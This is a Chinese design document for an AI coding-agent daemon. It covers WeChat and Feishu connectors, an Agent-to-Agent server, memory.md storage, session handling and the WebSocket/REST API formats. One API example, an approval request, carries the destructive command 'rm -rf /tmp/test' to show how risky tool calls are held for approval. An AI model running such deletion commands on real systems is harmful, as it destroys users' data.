+## 5. 消息平台技术方案
+
+### 5.1 微信 iLink（优先级 #1）
+
+**实现方式**: 根据 iLink 协议规范自行实现（参考 `/home/free/src/wechatbot/golang` 中的协议实现），**不引入外部依赖**。协议层约 1600 行纯标准库代码，直接写入 `internal/messaging/wechat/`
+
+| 维度 | 方案 |
+|------|------|
+| **认证** | QR 码扫码登录，凭证持久化到 `<GLOBAL_DIR>/wechat-credentials.json` |
+| **消息接收** | **长轮询** (`getupdates`)，无需公网 IP |
+| **消息发送** | `sendmessage` API，支持文本/图片/文件/视频 |
+| **Typing 指示** | 支持（`getconfig` → `sendtyping`） |
+| **CDN 媒体** | AES-128-ECB 加密上传/下载 |
+| **会话恢复** | `context_token` 自动管理；session 过期（errcode -14）自动重新登录 |
+| **优势** | 无需公网暴露；个人微信即可；长轮询天然可靠 |
+
+**代码结构**（参考 iLink 协议，VibeCoding 内部包自行实现）：
+
+```
+internal/messaging/wechat/
+├── wechat.go      # Bot 主体 + 消息处理（实现 messaging.Platform）
+├── types.go       # iLink 协议类型定义
+├── protocol.go    # iLink HTTP API 调用（getupdates/sendmessage/getconfig 等）
+├── auth.go        # QR 码登录 + 凭证持久化
+└── crypto.go      # AES-128-ECB CDN 加密/解密
+```
+
+全部使用 Go 标准库（`crypto/aes`、`net/http`、`encoding/json`），**零外部依赖**。
+
+**核心 API 端点**（来自 iLink 协议）：
+
+| 端点 | 作用 |
+|------|------|
+| `GET /ilink/bot/get_bot_qrcode` | 获取 QR 码 |
+| `GET /ilink/bot/get_qrcode_status` | 轮询扫码状态 |
+| `POST /ilink/bot/getupdates` | 长轮询接收消息 |
+| `POST /ilink/bot/sendmessage` | 发送消息 |
+| `POST /ilink/bot/getconfig` | 获取 typing ticket |
+| `POST /ilink/bot/sendtyping` | 发送/取消打字指示 |
+
+### 5.2 飞书（优先级 #2）
+
+**依赖**: `github.com/larksuite/oapi-sdk-go/v3` — 飞书官方 Go SDK
+
+参考文档: https://open.feishu.cn/document/server-side-sdk/golang-sdk-guide/preparations
+
+| 维度 | 方案 |
+|------|------|
+| **SDK** | 飞书官方 Go SDK v3 |
+| **消息接收** | **长连接** (WebSocket)，无需公网 IP |
+| **消息发送** | REST API (飞书 IM 接口) |
+| **认证** | App ID + App Secret |
+| **消息类型** | 文本、富文本、Markdown、卡片消息 |
+| **创建步骤** | 飞书开放平台 → 创建应用 → 开启机器人能力 → 配置事件订阅 |
+| **优势** | WebSocket 无需公网；官方 SDK 维护有保障；卡片消息表现力强 |
+
+**飞书长连接模式关键点**：
+- 使用 `larkws` 包建立 WebSocket 长连接
+- 订阅 `im.message.receive_v1` 事件接收消息
+- 无需配置回调 URL，适合内网/开发环境
+- 自动断线重连
+
+### 5.3 A2A 协议 (Agent-to-Agent)
+
+> ✅ **已完成** — `internal/a2a/` 独立顶层包，零外部依赖实现 JSON-RPC 2.0 over HTTP + SSE 流式。支持独立模式（`vibecoding a2a start`）和集成模式（hermes + `a2a.enabled: true`）。
+
+**依赖**: `github.com/a2aproject/a2a-go/v2` — Google A2A 官方 Go SDK
+
+**A2A 是什么**：Google 主导的开放协议，让不同框架、不同厂商的 AI Agent 能够互相发现、通信和协作，在不暴露内部状态的前提下完成复杂任务。
+
+#### 命令设计
+
+```
+vibecoding a2a
+├── start                 # 启动独立 A2A Server（不依赖 hermes）
+│   ├── --port <port>     # 监听端口（默认 8093）
+│   ├── --work-dir <dir>  # 工作目录
+│   ├── -p, --provider    # 默认 provider
+│   ├── -m, --model       # 默认 model
+│   └── --sandbox         # 启用 sandbox
+├── stop                  # 停止 A2A Server
+├── status                # 查看 A2A Server 状态
+└── card                  # 查看/生成 Agent Card
+```
+
+#### 两种运行模式
+
+| 模式 | 命令 | 端口 | 说明 |
+|------|------|------|------|
+| **独立模式** | `vibecoding a2a start` | 8093 | 独立运行，有自己的 HTTP 端口和 agent loop |
+| **集成模式** | `vibecoding hermes start` + `a2a.enabled: true` | 8090 (共享) | A2A 端点挂载到 hermes 的 HTTP 端口上 |
+
+**集成模式**：hermes 启动时，如果 `hermes.json` 中 `a2a.enabled: true`，自动将 A2A 端点注册到 hermes 的 HTTP mux 上：
+- `/.well-known/agent.json` → Agent Card
+- `/a2a` → JSON-RPC 2.0 handler
+- 复用 hermes 的认证、dispatcher、agent loop 基础设施
+
+**独立模式**：`vibecoding a2a start` 启动独立的 HTTP 服务器，适用于不需要消息平台但需要 A2A 能力的场景。
+
+#### 协议细节
+
+| 维度 | 方案 |
+|------|------|
+| **角色** | A2A Server（接收外部 Agent 的任务请求） |
+| **传输** | JSON-RPC 2.0 over HTTP（同步 + SSE 流式） |
+| **Agent Card** | `/.well-known/agent.json` 发布能力描述 |
+| **Task 生命周期** | submitted → working → completed/failed |
+| **认证** | Bearer token（复用 Gateway 的认证机制） |
+| **流式响应** | SSE 实时推送 Task 状态和 Artifact 更新 |
+
+**与现有协议的关系**：
+
+| 协议 | 角色 | 关系 |
+|------|------|------|
+| **ACP** (Agent Client Protocol) | 编辑器 ↔ Agent | 已有，用于 IDE 集成 |
+| **MCP** (Model Context Protocol) | Agent ↔ 工具服务 | 已有，让 Agent 调用外部工具 |
+| **A2A** (Agent-to-Agent) | Agent ↔ Agent | **新增**，Agent 间对等协作 |
+| **Gateway** (OpenAI 兼容) | 应用 ↔ LLM API | 已有，应用调 VibeCoding 当 LLM |
+
+**A2A Server 暴露的能力 (Agent Card)**：
+
+```json
+{
+  "name": "VibeCoding",
+  "description": "AI coding assistant with file editing, terminal, and search capabilities",
+  "url": "http://localhost:8093/a2a",
+  "version": "0.1.27",
+  "capabilities": {
+    "streaming": true,
+    "pushNotifications": false
+  },
+  "skills": [
+    {
+      "id": "code-edit",
+      "name": "Code Editing",
+      "description": "Read, write, and edit code files with precise text replacement"
+    },
+    {
+      "id": "terminal",
+      "name": "Terminal Execution",
+      "description": "Execute shell commands, run tests, build projects"
+    },
+    {
+      "id": "code-search",
+      "name": "Code Search",
+      "description": "Search codebases with ripgrep and fd"
+    }
+  ]
+}
+```
+
+**实现方式**：外部 Agent 通过 A2A SendMessage 发送任务 → dispatcher 创建 agent loop 处理 → 通过 SSE 流式返回结果。复用与消息平台相同的 agent 基础设施。
+
+#### 代码结构
+
+```
+internal/a2a/                     # 独立于 hermes 的顶层包
+├── server.go                    # A2A HTTP server（独立模式 + 集成模式）
+├── handler.go                   # JSON-RPC 2.0 handler（SendMessage / GetTask / CancelTask）
+├── agent_card.go                # Agent Card 生成 (/.well-known/agent.json)
+├── task.go                      # Task 生命周期管理（submitted → working → completed/failed）
+├── executor.go                  # AgentExecutor（A2A Task → agent loop）
+├── sse.go                       # SSE 流式响应
+└── config.go                    # A2A 配置
+```
+
+#### hermes.json 集成配置
+
+```jsonc
+{
+  // hermes.json 中启用 A2A
+  "a2a": {
+    "enabled": true,           // 启用后将 A2A 端点挂载到 hermes HTTP 端口
+    "port": 8093,              // 独立模式端口（集成模式忽略）
+    "agent_card": {            // 可选：自定义 Agent Card
+      "name": "VibeCoding",
+      "description": "AI coding assistant"
+    }
+  }
+}
+```
+
+---
+
+## 6. memory.md 设计
+
+### 6.1 核心原则：不破坏缓存命中
+
+> ✅ **已实现** — memory 通过 `memory` 工具按需读写，system prompt 仅有静态提示行。
+
+**关键设计决策**：memory.md 的内容 **不注入 system prompt**。
+
+原因：system prompt 是 prompt cache 的主要命中区域。如果每次都把变化的 memory 内容注入 system prompt，会导致缓存失效，增加成本和延迟。
+
+**实现方式**：memory 通过 `memory` 工具按需读写，与 `skill_ref` 工具的设计模式一致。Agent 在需要时主动调用 `memory(action="read")` 获取记忆，而不是被动接收注入。
+
+### 6.2 文件位置与查找优先级
+
+memory.md 遵循全局/项目级两层配置体系（详见第 2 节）：
+
+| 优先级 | 路径 | 用途 |
+|--------|------|------|
+| 1 (最高) | `hermes.json` 中 `memory.path` 显式指定 | 自定义路径 |
+| 2 | `.vibe/memory.md` | 项目级记忆（项目相关的上下文） |
+| 3 | `<GLOBAL_DIR>/memory.md` | 全局记忆（用户偏好、跨项目知识） |
+
+首次写入时：有项目上下文 → 创建 `.vibe/memory.md`；无项目上下文 → 创建 `<GLOBAL_DIR>/memory.md`。
+
+### 6.3 格式
+
+```markdown
+# Agent Memory
+
+## User Profile
+
+- 用户偏好使用中文交流
+- Go 为主要开发语言
+- 项目使用 Cobra + Bubble Tea 技术栈
+- 编辑器偏好: VSCode + Vim 键位
+
+## Working Memory
+
+- vibecoding 项目版本当前为 v0.1.26，下一个版本 v0.1.27
+- 用户对消息平台的优先级：微信 > 飞书 > Telegram > Discord
+- settings.json 中 provider 配置不要随意改动 schema
+
+## Lessons Learned
+
+- edit 工具的 oldText 必须在文件中唯一匹配，不要用太大的上下文
+- 用户不喜欢过多的确认提示，yolo 模式下直接执行
+- 中文文档要和英文文档同步更新
+```
+
+### 6.4 memory 工具设计
+
+> ✅ **已实现** — `internal/memory/tool.go` 完整实现了 read/add/update/delete 四种操作，section 级读写。
+
+```
+memory(action="read")
+  → 返回 memory.md 全文（Agent 按需调用）
+
+memory(action="read", section="User Profile")
+  → 返回指定 section 内容
+
+memory(action="add", section="Working Memory", content="新的记忆条目")
+  → 在指定 section 末尾追加条目
+
+memory(action="update", section="Working Memory", old="旧内容", new="新内容")
+  → 更新指定条目
+
+memory(action="delete", section="Working Memory", content="要删除的条目")
+  → 删除指定条目
+```
+
+### 6.5 System Prompt 中的提示（轻量级，不含数据）
+
+> ✅ **已实现** — `internal/memory/tool.go` 的 `PromptGuidelines()` 返回这行静态提示。
+
+在 system prompt 的 Guidelines 中添加一行静态提示（不影响缓存）：
+
+```
+- A persistent memory file (memory.md) is available via the `memory` tool. Read it at the start of complex tasks to recall user preferences and prior context. Update it when you learn important facts about the user or project.
+```
+
+这行提示是**静态**的，不包含 memory.md 的实际内容，所以不影响 prompt cache。
+
+---
+
+## 7. Session 管理设计
+
+### 7.1 核心原则
+
+> ✅ **已实现** — `dispatcher.go` 的 `resolveSession()` + `RotateSession()` 完整实现了以下逻辑。
+
+**单 session 默认 + 命令强制新建**。消息平台用户习惯连续对话，不应每次发消息都开新 session。
+
+| 决策 | 结论 |
+|--------|------|
+| 默认行为 | 每个 `platform:user_id` 自动创建一个持久 session，后续消息自动延续 |
+| 新建 | 用户发送 `/new` 命令时强制新建 session，旧 session 保留不删除 |
+| 跨平台 | **不打通**，同一个人的微信和飞书 session 完全独立 |
+| 存储隔离 | Hermes session 存储在 `<sessionDir>/hermes/`，与 CLI session 分开 |
+| context 满 | 自动 compaction，不销毁 session |
+
+### 7.2 存储结构
+
+Hermes session 与 CLI session 行为差异大（多用户、长期常驻、无 cwd 概念），因此用独立目录隔离：
+
+```
+<sessionDir>/
+├── --<base64(cwd)>--/                  # CLI/Gateway sessions（现有，不变）
+│   └── 20260529-120000_abc12345.jsonl
+│
+└── hermes/                             # Hermes sessions（新增）
+    ├── wechat/                         # 按平台分
+    │   ├── wxid_user1/                 # 按用户分
+    │   │   └── active.jsonl            # 当前活跃 session
+    │   └── wxid_user2/
+    │       └── active.jsonl
+    ├── feishu/
+    │   └── ou_user1/
+    │       └── active.jsonl
+    └── ws/                             # WebSocket client sessions
+        └── <conn-id>/
+            └── active.jsonl
+```
+
+**命名规则**：
+- `active.jsonl` — 当前活跃 session，每个用户始终只有一个
+- `/new` 时：`active.jsonl` → 重命名为 `<timestamp>_<id>.jsonl`（归档），然后创建新的 `active.jsonl`
+- 归档的 session 保留在同一用户目录下，可通过 `/sessions` 查看历史
+
+示例：`/new` 之后：
+
+```
+hermes/wechat/wxid_user1/
+├── active.jsonl                        # 新 session
+└── 20260529-120000_abc12345.jsonl       # 归档的旧 session
+```
+
+### 7.3 Session 生命周期
+
+```
+用户首次发消息
+  │
+  ├─ 检查 hermes/<platform>/<user_id>/active.jsonl
+  │   ├─ 存在 → 加载并继续对话
+  │   └─ 不存在 → 创建新 active.jsonl（cwd = 平台配置的 work_dir）
+  │
+  ├─ 持续对话… (消息追加到 active.jsonl)
+  │
+  ├─ context 接近上限 → 自动 compaction（不新建 session）
+  │
+  ├─ 用户发送 /new
+  │   ├─ active.jsonl 重命名为 <timestamp>_<id>.jsonl
+  │   └─ 创建新的 active.jsonl
+  │
+  └─ 用户发送 /sessions
+      └─ 列出当前 + 历史 sessions
+```
+
+### 7.4 消息平台命令
+
+> ⚠️ **部分实现** — `/new`、`/clear`、`/sessions`、`/status`、`/mode` 已实现；`/compact` 是 stub（仅返回字符串，未实际触发 compaction）。
+
+消息平台用户通过发送文本命令管理 session：
+
+| 命令 | 作用 | 状态 |
+|------|------|------|
+| `/new` | 归档当前 session，创建新的空 session | ✅ 已实现 |
+| `/clear` | 清空当前 session 的对话历史（不归档，直接重置） | ✅ 已实现（实际行为是归档+新建，同 `/new`） |
+| `/sessions` | 列出当前 + 历史 session（显示创建时间、消息数、预览） | ⚠️ 仅列出活跃 session，不显示历史归档 |
+| `/status` | 查看当前 session 状态（模型、token 用量、工作目录） | ⚠️ 显示 session/mode/messages/workdir，无 token 用量 |
+| `/compact` | 手动触发 context compaction | ❌ Stub — 仅返回固定字符串 |
+| `/mode <mode>` | 切换模式（plan/agent/yolo） | ✅ 已实现 |
+
+### 7.5 与现有 session.Manager 的关系
+
+Hermes 完全复用现有的 `session.Manager` 进行 JSONL 读写，只在上层包装路由逻辑：
+
+```go
+// hermes/dispatcher.go
+
+// resolveSession 查找或创建用户的活跃 session
+func (d *Dispatcher) resolveSession(platform, userID string) (*session.Manager, error) {
+    dir := filepath.Join(d.sessionDir, "hermes", platform, userID)
+    activePath := filepath.Join(dir, "active.jsonl")
+    
+    // 已有活跃 session → 加载并继续
+    if _, err := os.Stat(activePath); err == nil {
+        return session.Open(activePath)
+    }
+    
+    // 首次对话 → 创建
+    os.MkdirAll(dir, 0700)
+    workDir := d.resolveWorkDir(platform)
+    mgr := session.New(workDir, dir)  // cwd = 平台的 work_dir
+    mgr.Init()
+    // 重命名 session 文件为 active.jsonl
+    os.Rename(mgr.GetFile(), activePath)
+    return session.Open(activePath)
+}
+
+// rotateSession 归档当前 session 并新建
+func (d *Dispatcher) rotateSession(platform, userID string) (*session.Manager, error) {
+    dir := filepath.Join(d.sessionDir, "hermes", platform, userID)
+    activePath := filepath.Join(dir, "active.jsonl")
+    
+    // 归档: active.jsonl → <timestamp>_<id>.jsonl
+    if mgr, err := session.Open(activePath); err == nil {
+        hdr := mgr.GetHeader()
+        archived := filepath.Join(dir, fmt.Sprintf("%s_%s.jsonl",
+            time.Now().Format("20060102-150405"), hdr.ID[:8]))
+        os.Rename(activePath, archived)
+    }
+    
+    // 创建新的 active.jsonl
+    return d.resolveSession(platform, userID)
+}
+```
+
+**不改动 `session.Manager`** — Hermes 的 session 路由逻辑全部在 `hermes/dispatcher.go` 中，`session.Manager` 保持不变。
+
+---
+
+## 8. 子命令设计
+
+### 8.1 命令树
+
+> ⚠️ **大部分实现** — 仅 Smart Approvals 待讨论，其余均已实现。A2A 新增为独立子命令。
+
+```
+vibecoding hermes
+├── start                 # ✅ 启动 hermes 守护进程（前台运行）
+│   ├── -d                # ✅ 后台启动
+│   ├── --port <port>     # ✅ 指定 WebSocket+HTTP 监听端口（默认 8090）
+│   ├── --work-dir <dir>  # ✅ 默认工作目录（默认 cwd）
+│   ├── -p, --provider    # ✅ 默认 provider（覆盖 hermes.json）
+│   ├── -m, --model       # ✅ 默认 model（覆盖 hermes.json）
+│   ├── --multi-agent     # ✅ 启用多 Agent 模式（子 Agent 工具）
+│   └── --sandbox         # ✅ 启用 sandbox 模式（bwrap，默认关闭）
+├── stop                  # ✅ PID 文件 + SIGTERM 停止守护进程
+├── status                # ✅ PID 检查 + HTTP health 查询
+│
+├── client                # ✅ WebSocket 客户端（流式输出 + 斜杠命令）
+│   ├── --url <ws-url>    # ✅ 连接地址（默认 ws://localhost:8090/ws）
+│   └── --session <id>    # ✅ 指定/恢复 session
+│
+├── config
+│   ├── init              # ✅ 创建 hermes.json 配置模板
+│   │   ├── --global      # ✅ 写入 <GLOBAL_DIR>/hermes.json（默认）
+│   │   ├── --project     # ✅ 写入 .vibe/hermes.json
+│   │   └── --webhook     # ✅ 包含示例 webhook 路由
+│   └── show              # ✅ 查看当前生效配置
+│
+├── wechat
+│   ├── login             # ✅ 微信扫码登录
+│   │   └── --work-dir    # ❌ 未实现
+│   └── status            # ✅ 查看微信连接状态
+│
+├── feishu
+│   ├── setup             # ⚠️ 仅打印配置说明文本
+│   │   └── --work-dir    # ❌ 未实现
+│   └── status            # ✅ 查看飞书连接状态
+│
+├── webhook
+│   └── list              # ✅ 列出 webhook 路由
+│
+├── cron
+│   ├── list              # ✅ 列出定时任务
+│   ├── add               # ✅ 添加
+│   ├── delete (remove)   # ✅ 删除
+│   ├── enable            # ✅ 启用
+│   └── disable           # ✅ 禁用
+│
+├── memory
+│   ├── show              # ✅ 查看 memory.md 内容
+│   └── clear             # ✅ 清空 memory.md
+│
+└── sessions
+    └── list              # ✅ 查询运行实例的活跃 session
+```
+
+**新增：A2A 独立子命令**（与 hermes 平级）：
+
+```
+vibecoding a2a
+├── start                 # 🔶 待实现 — 启动独立 A2A Server
+│   ├── --port <port>     # 监听端口（默认 8093）
+│   ├── --work-dir <dir>  # 工作目录
+│   ├── -p, --provider    # 默认 provider
+│   ├── -m, --model       # 默认 model
+│   └── --sandbox         # 启用 sandbox
+├── stop                  # 🔶 待实现 — 停止 A2A Server
+├── status                # 🔶 待实现 — 查看 A2A Server 状态
+└── card                  # 🔶 待实现 — 查看/生成 Agent Card
+```
+
+### 8.2 Hermes 启动流程
+
+`vibecoding hermes start` 启动后做以下事情：
+
+```
+vibecoding hermes start
+  │
+  ├─ 1. 加载配置 ─────────────────────────────────
+  │     <GLOBAL_DIR>/hermes.json → .vibe/hermes.json 合并
+  │
+  ├─ 2. 启动 WebSocket + HTTP 网关（必选，始终启动）
+  │     ├── WebSocket  ws://0.0.0.0:8090/ws    # client / 第三方接入
+  │     ├── HTTP REST  http://0.0.0.0:8090/    # 状态查询、webhook 入站
+  │     └── A2A        http://0.0.0.0:8090/a2a # Agent-to-Agent（如启用）
+  │
+  ├─ 3. 连接消息平台（可选，按配置启用）
+  │     ├── wechat.enabled=true  → 长轮询 iLink（需已 login 过）
+  │     └── feishu.enabled=true  → WebSocket 长连接飞书 SDK
+  │
+  ├─ 4. 启动 Cron 调度器（如启用）
+  │
+  └─ 5. 就绪 ✓  等待消息
+```
+
+**关键设计**：WebSocket + HTTP 网关是 Hermes 的**核心服务**，始终启动。微信/飞书是**可选连接器**，只在配置启用且凭证就绪时才连接。即使不配置任何消息平台，Hermes 也可以通过 `hermes client` 或 WebSocket API 使用。
+
+### 8.3 WebSocket + HTTP API 规范
+
+Hermes 网关在单一端口（默认 `8090`）上提供所有服务，通过路由区分。
+
+#### 8.3.1 路由总览
+
+| 路由 | 协议 | 认证 | 状态 | 说明 |
+|------|------|------|------|------|
+| `/ws` | WebSocket | 是 | ✅ | 交互式对话（`hermes client` 和第三方客户端） |
+| `/api/health` | GET | 否 | ✅ | 健康检查 |
+| `/api/status` | GET | 是 | ✅ | 服务状态（平台连接、session 数、版本） |
+| `/api/sessions` | GET | 是 | ✅ | 列出所有活跃 session |
+| `/api/sessions/{id}` | GET | 是 | ✅ | 查看指定 session 详情 |
+| `/api/sessions/{id}` | DELETE | 是 | ✅ | 删除指定 session |
+| `/api/memory` | GET | 是 | ✅ | 读取 memory.md（含 source/path/content） |
+| `/api/memory` | PUT | 是 | ✅ | 更新 memory.md |
+| `/api/platforms` | GET | 是 | ✅ | 查看各消息平台状态 |
+| `/webhook/*` | POST | Secret | ✅ | Webhook 入站（GitHub 等） |
+| `/a2a` | POST | Bearer | ✅ | A2A JSON-RPC 2.0（message/send, task/get, task/cancel） |
+| `/a2a/events` | GET | 是 | ✅ | A2A SSE 事件流（task_id 参数） |
+| `/.well-known/agent.json` | GET | 否 | ✅ | A2A Agent Card |
+
+#### 8.3.2 WebSocket 协议 (`/ws`)
+
+> ✅ **已实现流式** — `wsDispatcherAdapter` 逐事件转换 `agent.Event` → `ws.WSEvent`，支持 text_delta/think_delta/tool_call/tool_result/tool_diff/usage/done/status/error。
+
+客户端通过 WebSocket 连接后，与 Hermes 进行双向 JSON 消息通信。
+
+**连接握手**：
+
+```
+GET /ws?token=<auth_token>&session=<session_id> HTTP/1.1
+Upgrade: websocket
+```
+
+| 参数 | 必选 | 说明 |
+|------|------|------|
+| `token` | 配置了 `auth_token` 时必选 | 认证 token |
+| `session` | 否 | 指定 session ID；空 = 使用/创建默认 session |
+
+**客户端 → 服务端消息**：
+
+```jsonc
+// 发送用户消息
+{
+  "type": "message",
+  "content": "帮我看下 main.go 的结构"
+}
+
+// 发送命令
+{
+  "type": "command",
+  "content": "/new"
+}
+
+// 工具审批响应（当 smart_approvals 启用时）
+{
+  "type": "approval",
+  "approval_id": "ap_abc123",
+  "approved": true
+}
+
+// 心跳
+{
+  "type": "ping"
+}
+```
+
+**服务端 → 客户端消息**：
+
+```jsonc
+// 连接建立确认
+{
+  "type": "connected",
+  "session_id": "hermes/ws/conn_abc123",
+  "version": "0.1.27",
+  "model": "deepseek-v4-flash",
+  "work_dir": "/home/user/project"
+}
+
+// 文本流式增量（agent 响应）
+{
+  "type": "text_delta",
+  "content": "这个文件的主要结构是…"
+}
+
+// thinking 流式增量
+{
+  "type": "think_delta",
+  "content": "分析 main.go 的引入包…"
+}
+
+// 工具调用开始
+{
+  "type": "tool_call",
+  "tool": "read",
+  "call_id": "tc_123",
+  "args": {"path": "main.go"}
+}
+
+// 工具执行结果
+{
+  "type": "tool_result",
+  "tool": "read",
+  "call_id": "tc_123",
+  "result": "package main\n\nimport (\n...",
+  "error": null
+}
+
+// 工具执行产生的文件 diff（edit/write 工具）
+{
+  "type": "tool_diff",
+  "call_id": "tc_456",
+  "path": "main.go",
+  "diff": "--- a/main.go\n+++ b/main.go\n@@ -1,3 +1,4 @@..."
+}
+
+// 审批请求（smart_approvals 启用时）
+{
+  "type": "approval_request",
+  "approval_id": "ap_abc123",
+  "tool": "bash",
+  "args": {"command": "rm -rf /tmp/test"},
+  "risk_level": "high"
+}
+
+// plan 工具更新
+{
+  "type": "plan_update",
+  "plan": {
+    "title": "重构 main.go",
+    "steps": [
+      {"title": "读取当前代码", "status": "done"},
+      {"title": "拆分函数", "status": "running"},
+      {"title": "添加测试", "status": "pending"}
+    ]
+  }
+}
+
+// 用量统计
+{
+  "type": "usage",
+  "prompt_tokens": 1200,
+  "completion_tokens": 350,
+  "total_tokens": 1550,
+  "cache_read_tokens": 800,
+  "cache_write_tokens": 400
+}
+
+// 当前轮完成
+{
+  "type": "done",
+  "stop_reason": "end_turn"
+}
+
+// 命令响应（/new, /clear, /status 等）
+{
+  "type": "command_result",
+  "command": "/new",
+  "message": "✅ New session created.",
+  "error": false
+}
+
+// 错误
+{
+  "type": "error",
+  "message": "provider error: rate limited",
+  "code": "rate_limit"
+}
+
+// 心跳响应
+{
+  "type": "pong"
+}
+```
+
+**消息流时序示例**：
+
+> ✅ **已实现** — `agentEventToWSEvent()` 将 agent 事件逐个转换为 WebSocket 消息。
+
+```
+client                          server
+  |-- {type:"message"} ---------->|
+  |                               |-- agent loop 开始
+  |<-- {type:"text_delta"} -------|-- 流式输出“让我看看…”
+  |<-- {type:"tool_call"} --------|-- 调用 read 工具
+  |<-- {type:"tool_result"} ------|-- 工具结果
+  |<-- {type:"text_delta"} -------|-- 继续流式输出
+  |<-- {type:"text_delta"} -------|   ...
+  |<-- {type:"usage"} ------------|-- token 用量
+  |<-- {type:"done"} -------------|-- 本轮完成
+```
+
+#### 8.3.3 HTTP REST API (`/api/*`)
+
+**认证**：配置了 `server.auth_token` 时，所有 `/api/*` 请求需携带 `Authorization: Bearer <token>` 头。
+
+---
+
+**`GET /api/health`** — 健康检查（无需认证）
+
+```json
+// Response 200
+{
+  "status": "ok",
+  "version": "0.1.27",
+  "uptime_seconds": 3600
+}
+```
+
+---
+
+**`GET /api/status`** — 服务状态
+
+```json
+// Response 200
+{
+  "version": "0.1.27",
+  "uptime_seconds": 3600,
+  "work_dir": "/home/user/project",
+  "model": "deepseek-v4-flash",
+  "provider": "deepseek-openai",
+  "sessions": {
+    "active": 3,
+    "total": 12
+  },
+  "platforms": {
+    "wechat": {"enabled": true, "connected": true, "users": 2},
+    "feishu": {"enabled": false, "connected": false, "users": 0}
+  },
+  "a2a": {"enabled": true},
+  "cron": {"enabled": true, "jobs": 2}
+}
+```
+
+---
+
+**`GET /api/sessions`** — 列出活跃 session
+
+```json
+// Response 200
+{
+  "sessions": [
+    {
+      "id": "hermes/wechat/wxid_user1",
+      "platform": "wechat",
+      "user_id": "wxid_user1",
+      "work_dir": "/home/user/project-a",
+      "message_count": 42,
+      "last_active": "2026-05-29T10:30:00Z",
+      "preview": "帮我看下 main.go..."
+    },
+    {
+      "id": "hermes/feishu/ou_user2",
+      "platform": "feishu",
+      "user_id": "ou_user2",
+      "work_dir": "/home/user/project-b",
+      "message_count": 8,
+      "last_active": "2026-05-29T09:15:00Z",
+      "preview": "添加单元测试..."
+    }
+  ]
+}
+```
+
+---
+
+**`GET /api/sessions/{id}`** — 查看 session 详情
+
+```json
+// Response 200
+{
+  "id": "hermes/wechat/wxid_user1",
+  "platform": "wechat",
+  "user_id": "wxid_user1",
+  "work_dir": "/home/user/project-a",
+  "mode": "agent",
+  "model": "deepseek-v4-flash",
+  "message_count": 42,
+  "created_at": "2026-05-29T08:00:00Z",
+  "last_active": "2026-05-29T10:30:00Z",
+  "context_tokens": 45000,
+  "context_limit": 128000,
+  "compaction_count": 1
+}
+```
+
+---
+
+**`DELETE /api/sessions/{id}`** — 删除 session
+
+```json
+// Response 200
+{"message": "session deleted", "id": "hermes/wechat/wxid_user1"}
+```
+
+---
+
+**`GET /api/memory`** — 读取 memory.md
+
+```json
+// Response 200
+{
+  "path": "/home/user/project/.vibe/memory.md",
+  "source": "project",
+  "content": "# Agent Memory\n\n## User Profile\n\n- 用户偏好中文...\n"
+}
+```
+
+---
+
+**`PUT /api/memory`** — 更新 memory.md
+
+```json
+// Request
+{"content": "# Agent Memory\n\n## User Profile\n\n- updated...\n"}
+
+// Response 200
+{"message": "memory updated", "path": "/home/user/project/.vibe/memory.md"}
+```
+
+---
+
+**`GET /api/platforms`** — 消息平台状态
+
+```json
+// Response 200
+{
+  "platforms": [
+    {
+      "name": "wechat",
+      "enabled": true,
+      "connected": true,
+      "work_dir": "/home/user/project-a",
+      "active_users": ["wxid_user1", "wxid_user2"],
+      "login_status": "logged_in"
+    },
+    {
+      "name": "feishu",
+      "enabled": true,
+      "connected": true,
+      "work_dir": "/home/user/project-b",
+      "active_users": ["ou_user1"],
+      "login_status": "connected"
+    }
+  ]
+}
+```
+
+#### 8.3.4 Webhook 入站 (`/webhook/*`)
+
+根据 `hermes.json` 中配置的路由分发外部事件：
+
+```
+POST /webhook/github
+X-Hub-Signature-256: sha256=...
+
+{"action": "opened", "pull_request": {...}}
+```
+
+验证 `webhooks.secret` 后，根据路由配置中的 `skill` 和 `delivery` 触发 agent 任务，结果通过指定的消息平台推送。
+
+#### 8.3.5 A2A 协议 (`/a2a`)
+
+仅当 `a2a.enabled=true` 时注册。详见 §5.3 A2A 协议设计。
+
+| 端点 | 说明 |
+|------|------|
+| `GET /.well-known/agent.json` | Agent Card（无需认证） |
+| `POST /a2a` | JSON-RPC 2.0（SendMessage / GetTask） |
+
+#### 8.3.6 WebSocket 消息类型汇总
+
+| 方向 | type | 说明 |
+|------|------|------|
+| **C→S** | `message` | 用户输入 |
+| **C→S** | `command` | 斜杠命令（`/new`, `/clear`, `/status` 等） |
+| **C→S** | `approval` | 工具审批响应 |
+| **C→S** | `ping` | 心跳 |
+| **S→C** | `connected` | 连接确认 + session/model 信息 |
+| **S→C** | `text_delta` | 文本流式增量 |
+| **S→C** | `think_delta` | thinking 流式增量 |
+| **S→C** | `tool_call` | 工具调用开始 |
+| **S→C** | `tool_result` | 工具执行结果 |
+| **S→C** | `tool_diff` | 文件 diff（edit/write） |
+| **S→C** | `approval_request` | 工具审批请求 |
+| **S→C** | `plan_update` | plan 工具状态更新 |
+| **S→C** | `usage` | token 用量统计 |
+| **S→C** | `done` | 本轮完成 |
+| **S→C** | `command_result` | 命令执行结果 |
+| **S→C** | `error` | 错误 |
+| **S→C** | `pong` | 心跳响应 |
+
+### 8.4 `hermes client` — 终端接入模式
+
+> ✅ **已实现** — `internal/hermes/client.go` WebSocket 客户端，支持流式输出（text_delta/think_delta/tool_call/tool_result/done）和斜杠命令（/new /clear /status /sessions /mode /compact）。
+
+`vibecoding hermes client` 通过 WebSocket 连接正在运行的 Hermes 网关。
+
+```bash
+# 连接本地 hermes
+vibecoding hermes client
+
+# 连接远程 hermes
+vibecoding hermes client --url ws://192.168.1.100:8090/ws
+
+# 恢复已有 session
+vibecoding hermes client --session abc123
+```
+
+**与直接运行 `vibecoding` 的区别**：
+
+| 维度 | `vibecoding`（普通 CLI） | `vibecoding hermes client` |
+|------|--------------------------|----------------------------|
+| **Agent 进程** | 本地独立进程 | 连接 Hermes 守护进程 |
+| **通信方式** | 本地函数调用 | WebSocket 流式通信 |
+| **Session** | 本地管理 | 服务端管理（per-user，可跨终端恢复） |
+| **Memory** | 无 | 共享 Hermes 的 memory.md |
+| **工具执行** | 本地执行 | Hermes 服务端执行（受 security/hooks 约束） |
+| **工作目录** | 本地 cwd | Hermes 服务端工作目录 |
+| **Cron/Webhook** | 无 | 可查看 Hermes 的调度状态 |
+
+**典型使用场景**：
+- 开发者想在终端中与已部署的 Hermes 实例交互（而不是通过微信/飞书）
+- 调试 Hermes 的行为，实时观察 agent loop 输出
+- 远程连接服务器上运行的 Hermes 实例
